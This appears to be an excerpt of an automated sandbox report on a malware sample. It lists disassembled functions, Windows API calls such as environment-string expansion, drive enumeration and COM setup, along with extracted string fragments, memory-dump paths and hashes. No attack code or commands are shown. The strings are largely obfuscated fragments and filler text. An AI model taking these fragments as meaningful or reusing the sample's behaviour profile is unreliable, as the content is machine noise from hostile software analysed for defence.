Instruction ID: 5acd0d8d49a4e87050990da5e38f1b712d7b794c687ca9dbbfefd5e09a334bce
Opcode Fuzzy Hash: e3bd4020aa1148b50ca4b11e2452c5e80dedc32e0037b4bd52bc6a6a378ef93a
Instruction Fuzzy Hash: 5FD097305C01003BD2206A1CEC07F2E379C8302711F84021CFA63CA1E5C8802900C3B8

Function 0147B180 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,0147F543,?,0147F543,?,00000000,00000000,00000000,00000000), ref: 0147B190

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0b1d8cf4c3f2813a66be9a75e92e676c6dbf4a3d64a60d8139eff5c4a481d7a7
Instruction ID: 7c08030a256266a0a76383c9bc903ce7bc941cfb01a0a7719cf2d5e12f816912
Opcode Fuzzy Hash: 0b1d8cf4c3f2813a66be9a75e92e676c6dbf4a3d64a60d8139eff5c4a481d7a7
Instruction Fuzzy Hash: B7C09231045122EBCA603F15FC08FCA3FA8EF696A4F1605A6B408770B4C770AC82CBD8

Non-executed Functions

Function 01463675 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1032COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 014636A9
GetLogicalDrives.KERNEL32 ref: 01463996

Strings

\a, xrefs: 01463725
45, xrefs: 014646DE
&Kt0, xrefs: 014642B5
bo, xrefs: 014649E4
mm, xrefs: 014649DA
_p, xrefs: 01464A02
|i, xrefs: 01464A98
XH, xrefs: 01464A2A
AQ, xrefs: 01464A5C
Vq, xrefs: 01464B78, 01464579, 0146474F, 01464774, 014642C2, 01464971
Hmkm, xrefs: 01463B69
ef, xrefs: 01464AA2
rl, xrefs: 014649D0
wY, xrefs: 014649EE
<, xrefs: 01464724
bmdm, xrefs: 01463B70
PR, xrefs: 01464A48
Ys, xrefs: 01464A84
9, xrefs: 014646D4
>>, xrefs: 0146471A
|s, xrefs: 01464A8E
\\, xrefs: 014649F8
Vq, xrefs: 0146499E
fmkm, xrefs: 01463B4D
pmrm, xrefs: 01463B3F
)mOm, xrefs: 01463B77

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: DrivesEnvironmentExpandLogicalStrings
String ID: 9$&Kt0$)mOm$45$<$>>$AQ$Hmkm$PR$Vq$Vq$XH$Ys$\\$_p$bmdm$bo$ef$fmkm$mm$pmrm$rl$wY$|i$|s$\a
API String ID: 1595903574-2236109924
Opcode ID: b87d8d9d4504ea33c75f7228db949e26756be6a37dc9956155ccebae8a853dab
Instruction ID: 96b28468f4fcfeb769d4d1d33df7018f3997aed03de46711d46c2d157a5dd704
Opcode Fuzzy Hash: b87d8d9d4504ea33c75f7228db949e26756be6a37dc9956155ccebae8a853dab
Instruction Fuzzy Hash: C9A2C8B9901329DBDB60DF18D88429EBB71FF95304F1086EDC8596B365E7349A81CF82

Function 01475ED3 Relevance: 40.3, Strings: 32, Instructions: 339COMMON

Download Yara Rule

Strings

), xrefs: 01475ED9
y, xrefs: 01476041
t, xrefs: 014760F5
m, xrefs: 014760EC
E, xrefs: 01476110
f, xrefs: 0147604A
j, xrefs: 01476089
t, xrefs: 014760C8
t, xrefs: 0147605C
}, xrefs: 0147609B
d, xrefs: 014760A4
:, xrefs: 01475FD5
|, xrefs: 01476014
|, xrefs: 014760AD
e, xrefs: 01476038
N, xrefs: 01476119
`, xrefs: 01476026
{, xrefs: 01476077
{, xrefs: 01476002
c, xrefs: 014760BF
s, xrefs: 01476092
z, xrefs: 01476065
K, xrefs: 01475FF0
r, xrefs: 0147602F
e, xrefs: 014760DA
Y, xrefs: 014760FE
t, xrefs: 014760D1
X, xrefs: 01476107
{, xrefs: 01475FF9
s, xrefs: 0147600B
}, xrefs: 01476080
O, xrefs: 01476122

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: )$:$E$K$N$O$X$Y$`$c$d$e$e$f$j$m$r$s$s$t$t$t$t$y$z${${${$|$|$}$}
API String ID: 0-2770104185
Opcode ID: 9c5c579ae9cb6abc1e543d8d0d2c922229dc8be188161d4f1fc744f164c68deb
Instruction ID: 81a56681b2d2d7b7901c7b3ea5e31868c1779e64318b9b4a8fe957060128e1e5
Opcode Fuzzy Hash: 9c5c579ae9cb6abc1e543d8d0d2c922229dc8be188161d4f1fc744f164c68deb
Instruction Fuzzy Hash: 4DE1C935A2462986DB25CF24CC413DDB3B2FF85310F5591EDC469AB361EB388A85CB4B

Function 01463C40 Relevance: 39.2, APIs: 2, Strings: 20, Instructions: 663COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 01463D59
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 01463D99

Strings

PR, xrefs: 01464A48
45, xrefs: 014646DE
Ys, xrefs: 01464A84
&Kt0, xrefs: 014642B5
9, xrefs: 014646D4
>>, xrefs: 0146471A
|s, xrefs: 01464A8E
bo, xrefs: 014649E4
mm, xrefs: 014649DA
_p, xrefs: 01464A02
|i, xrefs: 01464A98
XH, xrefs: 01464A2A
AQ, xrefs: 01464A5C
\\, xrefs: 014649F8
Vq, xrefs: 0146499E
Vq, xrefs: 01464B78, 01464579, 0146474F, 01464774, 014642C2, 01464971
ef, xrefs: 01464AA2
rl, xrefs: 014649D0
<, xrefs: 01464724
wY, xrefs: 014649EE

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
API String ID: 237503144-3538275056
Opcode ID: d3db935cd7d7a3728ceaf7545ee8cb3713a7d96a2a5d88a2c6953b0bea2ab8de
Instruction ID: f08f1d915b49b2960ee1f2007164223b18ad80e3f6336b230a9569f64f701ece
Opcode Fuzzy Hash: d3db935cd7d7a3728ceaf7545ee8cb3713a7d96a2a5d88a2c6953b0bea2ab8de
Instruction Fuzzy Hash: 917252B99053699BDB60DF19D8883CDBB71FB95304F108AEDC5692B390DB744A81CF82

Function 01463EC0 Relevance: 39.2, APIs: 1, Strings: 21, Instructions: 651COMMON

Download Yara Rule

Strings

PR, xrefs: 01464A48
45, xrefs: 014646DE
Ys, xrefs: 01464A84
&Kt0, xrefs: 014642B5
9, xrefs: 014646D4
>>, xrefs: 0146471A
|s, xrefs: 01464A8E
bo, xrefs: 014649E4
mm, xrefs: 014649DA
_p, xrefs: 01464A02
|i, xrefs: 01464A98
XH, xrefs: 01464A2A
0b, xrefs: 01463F5C
AQ, xrefs: 01464A5C
\\, xrefs: 014649F8
Vq, xrefs: 0146499E
Vq, xrefs: 01464B78, 01464579, 0146474F, 01464774, 014642C2, 01464971
ef, xrefs: 01464AA2
rl, xrefs: 014649D0
<, xrefs: 01464724
wY, xrefs: 014649EE

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 9$&Kt0$0b$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
API String ID: 0-1097330926
Opcode ID: d40d0aaab96dbc5587ad8223634e40c749bb2dcfa28cb17e7ec9700d0bbef9d5
Instruction ID: 8a2cd027fa86ac5e39bafb92bf536580176aed0025a260e52187c32ca2735f21
Opcode Fuzzy Hash: d40d0aaab96dbc5587ad8223634e40c749bb2dcfa28cb17e7ec9700d0bbef9d5
Instruction Fuzzy Hash: 077251B8D0526A9BDB60DF59DC883CDBB75FFA5304F108AE9C4596B250DB340A81CF82

Function 01464060 Relevance: 37.3, APIs: 1, Strings: 20, Instructions: 581COMMON

Download Yara Rule

Strings

PR, xrefs: 01464A48
45, xrefs: 014646DE
Ys, xrefs: 01464A84
&Kt0, xrefs: 014642B5
9, xrefs: 014646D4
>>, xrefs: 0146471A
|s, xrefs: 01464A8E
bo, xrefs: 014649E4
mm, xrefs: 014649DA
_p, xrefs: 01464A02
|i, xrefs: 01464A98
XH, xrefs: 01464A2A
AQ, xrefs: 01464A5C
\\, xrefs: 014649F8
Vq, xrefs: 0146499E
Vq, xrefs: 01464B78, 01464579, 0146474F, 01464774, 014642C2, 01464971
ef, xrefs: 01464AA2
rl, xrefs: 014649D0
<, xrefs: 01464724
wY, xrefs: 014649EE

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
API String ID: 0-3538275056
Opcode ID: fa7762bc3835780e26f90d2407dc30474ad9920532865e58f94ac9b248a97898
Instruction ID: 0d6efaa47cf3a7aa91188b39ac48dd2683df96e440fc2c758a243f209fd01cc6
Opcode Fuzzy Hash: fa7762bc3835780e26f90d2407dc30474ad9920532865e58f94ac9b248a97898
Instruction Fuzzy Hash: 166241B990536A9BDB60DF19DC883CDBB75FBA5304F108AE9C4593B250DB354A81CF82

Function 00A12A83 Relevance: 31.5, Strings: 25, Instructions: 244COMMON

Download Yara Rule

Strings

OVTeaKslizCq, xrefs: 00A12D92
qGoWCeyAc, xrefs: 00A12CCD
lZnTSoH, xrefs: 00A12E06
sea, xrefs: 00A12BE4
orit, xrefs: 00A12C0B
umme, xrefs: 00A12C33
Spee, xrefs: 00A12BB2
f p, xrefs: 00A12CA1
Word phone traiTeacher not quickly energy their. Co, xrefs: 00A12E29
er., xrefs: 00A12C3D
pply, xrefs: 00A12BC6
t ta, xrefs: 00A12C1F
KddaTVdpg, xrefs: 00A12CAB
sk s, xrefs: 00A12C29
Me add require car information. Floor work t, xrefs: 00A12CBB
a, xrefs: 00A12BF8
ove, xrefs: 00A12B11
Concern face foreign mission. Myself, xrefs: 00A12E0E
ject, xrefs: 00A12BDA
ch a, xrefs: 00A12BBC
Auth, xrefs: 00A12C01
son , xrefs: 00A12BEE
y lo, xrefs: 00A12C15
pro, xrefs: 00A12BD0
LITkDS, xrefs: 00A12CB3

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID:
String ID: pro$ sea$Auth$Concern face foreign mission. Myself$KddaTVdpg$LITkDS$Me add require car information. Floor work t$OVTeaKslizCq$Spee$Word phone traiTeacher not quickly energy their. Co$a$ch a$er.$f p$ject$lZnTSoH$orit$ove$pply$qGoWCeyAc$sk s$son $t ta$umme$y lo
API String ID: 0-347408702
Opcode ID: 2ab4ea9b78faf6df4e3b47c5443b5d8e7cdcc26fef2b8928624019547fd10443
Instruction ID: 81f977237567ac019558bb88b1cc057f1ffa3a0cb5452153a3c0921f821d9c06
Opcode Fuzzy Hash: 2ab4ea9b78faf6df4e3b47c5443b5d8e7cdcc26fef2b8928624019547fd10443
Instruction Fuzzy Hash: 9CE1ADB0E0421ACFCB64CFA9C981BDDBBF0BF48304F10859AE458AB255D3749A95CF95

Function 01477CF0 Relevance: 26.8, APIs: 10, Strings: 5, Instructions: 574memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0148268C,00000000,00000001,0148267C,00000000), ref: 01477E10
SysAllocString.OLEAUT32([d), ref: 01477E93
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 01477ED1
SysAllocString.OLEAUT32(!,.,), ref: 01477F2F
SysAllocString.OLEAUT32(B6ABB756), ref: 01477FEF
VariantInit.OLEAUT32(?), ref: 0147805E
VariantClear.OLEAUT32(?), ref: 014781B1
SysFreeString.OLEAUT32 ref: 014781D4
SysFreeString.OLEAUT32(?), ref: 014781DA
SysFreeString.OLEAUT32(00000000), ref: 014781EE

Strings

[d, xrefs: 01477D7C
W;, xrefs: 01477D37
\, xrefs: 01477DCA
C, xrefs: 01477DBF
,,Y,, xrefs: 01477EE7

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
String ID: ,,Y,$C$W;$[d$\
API String ID: 2485776651-2867424240
Opcode ID: 741cfef4f4d0886b71365c766ab2526becf227b3680fc602da303ed2534b7e6f
Instruction ID: 6c9992bfe65029c13d997f90932c92b579d6eab1fff960141bae5b47592c7904
Opcode Fuzzy Hash: 741cfef4f4d0886b71365c766ab2526becf227b3680fc602da303ed2534b7e6f
Instruction Fuzzy Hash: FD02DB766083019FE710DF69C884BABBBE5EFC5710F14882EEA859B3A0D775D801CB42

Function 014577AD Relevance: 23.5, APIs: 3, Strings: 10, Instructions: 788COMMON

Download Yara Rule

Strings

Jc1t, xrefs: 014577D0
21, xrefs: 0145786B
)fvf, xrefs: 01457CDD
=f!f, xrefs: 01457CBD
"f&f, xrefs: 01457CB5
,f4f, xrefs: 01457CD5
=f(f, xrefs: 01457CC5
Jc1t, xrefs: 01457D27, 01457D1E, 01457886, 01457913, 014578A2, 01457962
Pf6f, xrefs: 01457CCD
{fGf, xrefs: 01457CF6

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: "f&f$)fvf$,f4f$21$=f!f$=f(f$Jc1t$Jc1t$Pf6f${fGf
API String ID: 0-2638289701
Opcode ID: 62cfe2772dd6e378b785b96d73518d4d60f087c9b7d5f4f4a29307995e6d5231
Instruction ID: e8ee7415fdaa540b85112b97408a518ddf69bf53e50cc7cfecb30ecd4d9a559b
Opcode Fuzzy Hash: 62cfe2772dd6e378b785b96d73518d4d60f087c9b7d5f4f4a29307995e6d5231
Instruction Fuzzy Hash: 004213725083018BD365CF29C8907ABB7E1FFC8315F15892EE8C99B366EB349951CB52

Function 00A1116C Relevance: 19.7, APIs: 13, Instructions: 202sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00A111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00A11238
__p__acmdln.MSVCRT ref: 00A11261
malloc.MSVCRT ref: 00A112EB
strlen.MSVCRT ref: 00A11323
malloc.MSVCRT ref: 00A1132E
memcpy.MSVCRT ref: 00A11344
GetStartupInfoA.KERNEL32 ref: 00A11433

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 0eba57637cb70951e09cf30aeed6ce4a6aac564aa44a70977aba7f43f2356789
Instruction ID: 10d74329f6ea7c67e30bb0e1378c1acec7c20031b01b8f2b72c59d51d8ca3d45
Opcode Fuzzy Hash: 0eba57637cb70951e09cf30aeed6ce4a6aac564aa44a70977aba7f43f2356789
Instruction Fuzzy Hash: AC8190B19083158FDB10DFA8E9843EDB7F1FB49344F11852DDA858B311DB799889CB92

Function 0145E390 Relevance: 18.3, Strings: 14, Instructions: 821COMMON

Download Yara Rule

Strings

7:n\, xrefs: 0145E877
^*a, xrefs: 0145E6D2
%b*], xrefs: 0145E6BA
5a|u, xrefs: 0145E6FA
?g3q, xrefs: 0145E75A
'O'O, xrefs: 0145EABD
A:v], xrefs: 0145E6CA
>, xrefs: 0145E72A
3?Uq, xrefs: 0145E6F2
2O#O, xrefs: 0145EAC5
<[&^, xrefs: 0145E6DA
#J+Y, xrefs: 0145E732
sy:K, xrefs: 0145E712
Y?q?, xrefs: 0145E791

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: ^*a$#J+Y$%b*]$'O'O$2O#O$3?Uq$5a|u$7:n\$<[&^$>$?g3q$A:v]$Y?q?$sy:K
API String ID: 0-3553224314
Opcode ID: 00aa52cca2931f5208f6d6e9982fb2ac0594fe7a6c030ccb12c2eea101fdd474
Instruction ID: e0747a6b3ca7b5d6cff63b87c21c2ef448cb719f1c206967488747ae69e38d58
Opcode Fuzzy Hash: 00aa52cca2931f5208f6d6e9982fb2ac0594fe7a6c030ccb12c2eea101fdd474
Instruction Fuzzy Hash: 325247709083518FD725DF28C45076FFBE1AF95314F084A6EE8D96B3A2E7358A06C792

Function 01460A20 Relevance: 16.7, Strings: 13, Instructions: 419COMMON

Download Yara Rule

Strings

d3f3, xrefs: 01460AC0
:3 3, xrefs: 01460AE0
#3#3, xrefs: 01460AE8
'3!3, xrefs: 01460AF0
*, xrefs: 01460EBB
#3=3, xrefs: 01460AF8
83F3, xrefs: 01460B08
93=3, xrefs: 01460B00
k3l3, xrefs: 01460AD0
O30, xrefs: 01460B18
83R3, xrefs: 01460AD8
J3L3, xrefs: 01460B10
i3_3, xrefs: 01460AC8

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: #3#3$#3=3$'3!3$*$83F3$83R3$93=3$:3 3$J3L3$O30$d3f3$i3_3$k3l3
API String ID: 0-1612148737
Opcode ID: 9b3c67f0155a4c2d2696f187b7d8da826b774a5ba61d9d33e52fb63cf2817ea2
Instruction ID: eb3d2f4ff2065192ef379665f9a650675faf09d35a79821e071d6e90a3abcf7d
Opcode Fuzzy Hash: 9b3c67f0155a4c2d2696f187b7d8da826b774a5ba61d9d33e52fb63cf2817ea2
Instruction Fuzzy Hash: 80B1EEB15183108BD724DF28C86266BB7F5FFD1358F188A1DE9868F3A4E7748844CB92

Function 014685E1 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 300COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0146860A

Strings

J, xrefs: 0146893A
,J^J, xrefs: 01468922
bJSJ, xrefs: 014689D9
rJnJ, xrefs: 0146892A
tJdJ, xrefs: 01468932
wJbJ, xrefs: 01468912
cJwJ, xrefs: 0146891A

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: J$,J^J$bJSJ$cJwJ$rJnJ$tJdJ$wJbJ
API String ID: 237503144-492521606
Opcode ID: f07de225aafdb96b5da3023519fbf2f825753c40556a7b10721824c898aba1cd
Instruction ID: 1dd68e46df54244c9b9fb8673cb030dafb2f0341f4f2859f7be49de917bd036f
Opcode Fuzzy Hash: f07de225aafdb96b5da3023519fbf2f825753c40556a7b10721824c898aba1cd
Instruction Fuzzy Hash: 88A1CE729083128BD724CF58C4506AFB3F2FFC1358F06892DE99A9B264E7749945CB86

Function 01450247 Relevance: 13.0, APIs: 2, Strings: 5, Instructions: 700COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 014504C9
RtlExpandEnvironmentStrings.NTDLL ref: 014505C0

Strings

i, xrefs: 014509EE
$, xrefs: 01450985
X@, xrefs: 01450916
<., xrefs: 0145088E
f@, xrefs: 014509E4

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: $$<.$X@$f@$i
API String ID: 237503144-92190101
Opcode ID: 720d8df8e65663179982a28f873021f0dd2838a1c3771d5eb4b01d9fc445927f
Instruction ID: c304bacad43c5498a352961fb37d3cf94f749c1bc57fc7d546e2ea3ee0c2ce07
Opcode Fuzzy Hash: 720d8df8e65663179982a28f873021f0dd2838a1c3771d5eb4b01d9fc445927f
Instruction Fuzzy Hash: 3C527376A187518BD764DF39C4903AFBBE1AF95320F154A2EE8E9873E1D73488418B43

Function 01476569 Relevance: 12.8, Strings: 10, Instructions: 278COMMON

Download Yara Rule

Strings

?|, xrefs: 01476674
0, xrefs: 01476886
A|, xrefs: 014765DB
Y|, xrefs: 01476593
>, xrefs: 01476742
H|, xrefs: 0147661A
L|, xrefs: 014765F6
|, xrefs: 0147658A
3), xrefs: 01476896
<, xrefs: 01476739

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 0$3)$<$>$?|$A|$H|$L|$Y|$|
API String ID: 0-3316653610
Opcode ID: 8489903661ec52a7e324fefbefe9b44ac38f8f9fa700856aa11dcd4c7651ec42
Instruction ID: bb7b49badd834ebaa3d14e1fbdca1742c0637c9dfcd7ffe5309553dbc82fb596
Opcode Fuzzy Hash: 8489903661ec52a7e324fefbefe9b44ac38f8f9fa700856aa11dcd4c7651ec42
Instruction Fuzzy Hash: 04C1D471D1426886DB24CF69CC107DDB3B2EF40314F1595EAC959AB3A5E7344E82CB8A

Function 00A114E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00A114F0
LoadLibraryA.KERNEL32 ref: 00A11506
GetProcAddress.KERNEL32 ref: 00A11525
GetProcAddress.KERNEL32 ref: 00A11537

Strings

__register_frame_info, xrefs: 00A1151A
libgcc_s_dw2-1.dll, xrefs: 00A114E9, 00A114FF
__deregister_frame_info, xrefs: 00A1152C

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 1c744d190a6d89f1cdde77072ecefd09c3ea52a46f3b51d770c2fbfd7364deb6
Instruction ID: 25d040cd887a51a1e8f41572469c8d971c60f829145a4cde195067addbf92464
Opcode Fuzzy Hash: 1c744d190a6d89f1cdde77072ecefd09c3ea52a46f3b51d770c2fbfd7364deb6
Instruction Fuzzy Hash: FF0144B58082049FC340BFB9AA492DE7FF5EB847A0F01856DD98A87200D77584C8CBA3

Function 00A113C9 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00A11238
__p__acmdln.MSVCRT ref: 00A11261
malloc.MSVCRT ref: 00A112EB
strlen.MSVCRT ref: 00A11323
malloc.MSVCRT ref: 00A1132E
memcpy.MSVCRT ref: 00A11344
_amsg_exit.MSVCRT ref: 00A113EA
_initterm.MSVCRT ref: 00A1140C

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: ef90a9b9d82fa85d40275a321995b95af8c3708cad27d0dede8789ded2f48eca
Instruction ID: c5ba2dbc7a5cb8f0166ed7ebb5a62db2cc9d7ccd16866c5de3b9260300cb822e
Opcode Fuzzy Hash: ef90a9b9d82fa85d40275a321995b95af8c3708cad27d0dede8789ded2f48eca
Instruction Fuzzy Hash: 684139B49083058FDB10EFA8E5843DDB7F1FB48340F11892DD98597211DB78998ACB42

Function 0145CAA0 Relevance: 11.8, Strings: 9, Instructions: 564COMMON

Download Yara Rule

Strings

8!?!, xrefs: 0145CB5E
ejuj, xrefs: 0145CEB8
pdvd, xrefs: 0145CCD3
|jsj, xrefs: 0145CEA0
8!(!, xrefs: 0145CB4E
=_, xrefs: 0145D054
2!0!, xrefs: 0145CB46
(!T!, xrefs: 0145CB6E
*, xrefs: 0145D128

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: (!T!$*$2!0!$8!(!$8!?!$=_$ejuj$pdvd$|jsj
API String ID: 0-157059723
Opcode ID: 21f3ced72fbcf9dbff50a829f6f93b5c82f59a970191f60e8aae16cbfaa7b8ba
Instruction ID: e56e5c32cdc0eb940a2fa064a1ee1a9da4477153d8c8b1f58566b7aa310715fa
Opcode Fuzzy Hash: 21f3ced72fbcf9dbff50a829f6f93b5c82f59a970191f60e8aae16cbfaa7b8ba
Instruction Fuzzy Hash: 6702EDB29083119BC7149F19C88166FB7F2FF95354F08882DF9898B362E7359609CB96

Function 01468A4D Relevance: 11.6, Strings: 9, Instructions: 394COMMON

Download Yara Rule

Strings

oq|q, xrefs: 01468B36
J, xrefs: 0146893A
,J^J, xrefs: 01468922
Uqmq, xrefs: 01468ADE
bJSJ, xrefs: 014689D9
rJnJ, xrefs: 0146892A
tJdJ, xrefs: 01468932
wJbJ, xrefs: 01468912
cJwJ, xrefs: 0146891A

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
